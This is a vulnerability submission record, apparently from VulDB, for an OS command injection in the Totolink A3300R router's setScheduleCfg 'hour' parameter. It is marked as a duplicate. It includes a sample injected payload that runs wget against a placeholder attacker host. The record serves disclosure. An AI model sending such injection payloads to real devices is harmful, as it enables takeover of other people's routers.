| Title | Totolink A3300R V17.0.0cu.557_B20221024 OS Command Injection |
|---|
| Description | In topicurl=setScheduleCfg, parameter hour in /cgi-bin/cstecgi.cgi is not sanitized before being incorporated into command construction (Uci_Set_Str -> sprintf -> CsteSystem -> execv). Attackers can inject shell syntax (e.g., 1$(wget http://attacker/testpoc)) to execute arbitrary commands. |
|---|
| Source | ⚠️ https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-hour-cmd-injection |
|---|
| User | Svigo_o (UID 95970) |
|---|
| Submission | 03/30/2026 04:55 (9 days ago) |
|---|
| Moderation | 04/06/2026 11:42 (7 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 250463 [Totolink A3300R 17.0.0cu.557_B20221024 setScheduleCfg minute command injection] |
|---|
| Points | 0 |
|---|